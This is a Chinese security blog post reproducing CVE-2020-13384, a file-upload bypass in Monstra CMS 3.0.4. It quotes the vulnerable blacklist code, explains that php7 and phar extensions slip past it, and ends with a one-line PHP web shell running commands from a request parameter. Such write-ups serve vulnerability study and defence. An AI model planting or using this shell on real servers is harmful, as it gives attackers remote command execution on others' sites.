<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/1655090890230.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/1655090890230.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":3,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="Monstra v3.0.4 文件上传">
<meta property="og:type" content="article">
<meta property="og:title" content="[漏洞复现]Monstra V3.0.4 文件上传">
<meta property="og:url" content="http://example.com/2022/10/27/Monstra%20CMS%20v3.0.4%20%E7%BB%95%E8%BF%87/index.html">
<meta property="og:site_name" content="Security">
<meta property="og:description" content="Monstra v3.0.4 文件上传">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2022/10/27/yS8jECMZtR2KDiq.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/27/NVBef3a4Edb765S.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/27/mAts2FibgDTeoZh.png">
<meta property="og:image" content="https://s2.loli.net/2022/10/27/srUGkhvQ4aqMXby.png">
<meta property="article:published_time" content="2022-10-27T11:22:30.840Z">
<meta property="article:modified_time" content="2022-11-07T13:03:29.247Z">
<meta property="article:author" content="l3ife">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2022/10/27/yS8jECMZtR2KDiq.png">

<link rel="canonical" href="http://example.com/2022/10/27/Monstra%20CMS%20v3.0.4%20%E7%BB%95%E8%BF%87/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>[漏洞复现]Monstra V3.0.4 文件上传 | Security</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Security</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签<span class="badge">7</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="th fa-fw"></i>分类<span class="badge">4</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档<span class="badge">18</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/10/27/Monstra%20CMS%20v3.0.4%20%E7%BB%95%E8%BF%87/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="l3ife">
      <meta itemprop="description" content="谁想当安全混子呢">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Security">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          [漏洞复现]Monstra V3.0.4 文件上传
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-10-27 19:22:30" itemprop="dateCreated datePublished" datetime="2022-10-27T19:22:30+08:00">2022-10-27</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-11-07 21:03:29" itemprop="dateModified" datetime="2022-11-07T21:03:29+08:00">2022-11-07</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">渗透测试</span></a>
                </span>
            </span>

          
            <div class="post-description">Monstra v3.0.4 文件上传</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h1><p>Monstra 是一个现代化的轻量级内容管理系统。它易于安装、升级和使用。</p>
<p>Monstra CMS 3.0.4版本中存在着一处安全漏洞，该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。</p>
<p><strong>编号</strong></p>
<p><em><strong>CVE-2020-13384</strong></em></p>
<p>漏洞成因</p>
<p>系统未对特殊后缀文件进行黑名单过滤，导致上传的特殊后缀以php执行</p>
<h1 id="白盒测试"><a href="#白盒测试" class="headerlink" title="白盒测试"></a>白盒测试</h1><p>跳转monstra-3.0.4\plugins\box\filesmanager\filesmanager.admin.php</p>
<p><img src="https://s2.loli.net/2022/10/27/yS8jECMZtR2KDiq.png" alt="image.png"></p>
<p>黑名单如下</p>
<pre><code>$forbidden_types = array(&#39;html&#39;, &#39;htm&#39;, &#39;js&#39;, &#39;jsb&#39;, &#39;mhtml&#39;, &#39;mht&#39;,
                                 &#39;php&#39;, &#39;phtml&#39;, &#39;php3&#39;, &#39;php4&#39;, &#39;php5&#39;, &#39;phps&#39;,
                                 &#39;shtml&#39;, &#39;jhtml&#39;, &#39;pl&#39;, &#39;py&#39;, &#39;cgi&#39;, &#39;sh&#39;, &#39;ksh&#39;, &#39;bsh&#39;, &#39;c&#39;, &#39;htaccess&#39;, &#39;htpasswd&#39;,&#39;exe&#39;, &#39;scr&#39;, &#39;dll&#39;, &#39;msi&#39;, &#39;vbs&#39;, &#39;bat&#39;, &#39;com&#39;, &#39;pif&#39;, &#39;cmd&#39;, &#39;vxd&#39;, &#39;cpl&#39;, &#39;empty&#39;);
</code></pre>
<p>move_upload_file函数</p>
<pre><code>if ($_FILES[&#39;file&#39;]) &#123;
                    if ( ! in_array(File::ext($_FILES[&#39;file&#39;][&#39;name&#39;]), $forbidden_types)) &#123;
                        $filepath = $files_path.Security::safeName(basename($_FILES[&#39;file&#39;][&#39;name&#39;], File::ext($_FILES[&#39;file&#39;][&#39;name&#39;])), null, false).&#39;.&#39;.File::ext($_FILES[&#39;file&#39;][&#39;name&#39;]);
                        $uploaded = move_uploaded_file($_FILES[&#39;file&#39;][&#39;tmp_name&#39;], $filepath);
                        if ($uploaded !== false &amp;&amp; is_file($filepath)) &#123;
                            Notification::set(&#39;success&#39;, __(&#39;File was uploaded&#39;, &#39;filesmanager&#39;));
                        &#125; else &#123;
                            $error = &#39;File was not uploaded&#39;;
                        &#125;
                    &#125; else &#123;
                        $error = &#39;Forbidden file type&#39;;
                    &#125;
                &#125; else &#123;
                    $error = &#39;File was not uploaded&#39;;
                &#125;
&#125;
</code></pre>
<p>黑名单缺少php2和php7，管理员配置不当，允许php7格式解析成php代码时，可以触发该漏洞</p>
<p>上传php7，文件保存路径在&#x2F;public&#x2F;upload&#x2F;</p>
<p><img src="https://s2.loli.net/2022/10/27/NVBef3a4Edb765S.png" alt="image.png"></p>
<p>php3、php4、php5标记文件特点，但后台仍将这个当作php解析，第一个版本从php3开始，所以没有php2</p>
<h1 id="黑盒测试"><a href="#黑盒测试" class="headerlink" title="黑盒测试"></a>黑盒测试</h1><p>任意注册，进入登陆页面</p>
<p><img src="https://s2.loli.net/2022/10/27/mAts2FibgDTeoZh.png" alt="image.png"></p>
<p>上传php7，apache并没有对php7进行解析</p>
<p><img src="https://s2.loli.net/2022/10/27/srUGkhvQ4aqMXby.png" alt="image.png"></p>
<p>使用phar上传的条件</p>
<pre><code>1.phar扩展提供了一种将整个PHP应用程序放入.phar文件中的方法
2.默认在php.ini打开
3.支持上传文件到服务端
</code></pre>
<p>写一句话到phar文件并上传</p>
<pre><code>&lt;?php if(isset($_REQUEST[&#39;cmd&#39;]))&#123;echo &quot;&lt;pre&gt;&quot;;$cmd = ($_REQUEST[&#39;cmd&#39;]);system($cmd);echo &quot;&lt;/pre&gt;&quot;;die;&#125;?&gt;
</code></pre>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>l3ife
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2022/10/27/Monstra%20CMS%20v3.0.4%20%E7%BB%95%E8%BF%87/" title="[漏洞复现]Monstra V3.0.4 文件上传">http://example.com/2022/10/27/Monstra CMS v3.0.4 绕过/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/10/18/ctfshow-ssti/" rel="prev" title="SSTI模板注入">
      <i class="fa fa-chevron-left"></i> SSTI模板注入
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/11/01/NC/" rel="next" title="[漏洞复现]用友 BeanShell命令执行">
      [漏洞复现]用友 BeanShell命令执行 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%8F%8F%E8%BF%B0"><span class="nav-number">1.</span> <span class="nav-text">描述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%99%BD%E7%9B%92%E6%B5%8B%E8%AF%95"><span class="nav-number">2.</span> <span class="nav-text">白盒测试</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%BB%91%E7%9B%92%E6%B5%8B%E8%AF%95"><span class="nav-number">3.</span> <span class="nav-text">黑盒测试</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">l3ife</p>
  <div class="site-description" itemprop="description">谁想当安全混子呢</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">18</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>
	  

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">l3ife</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
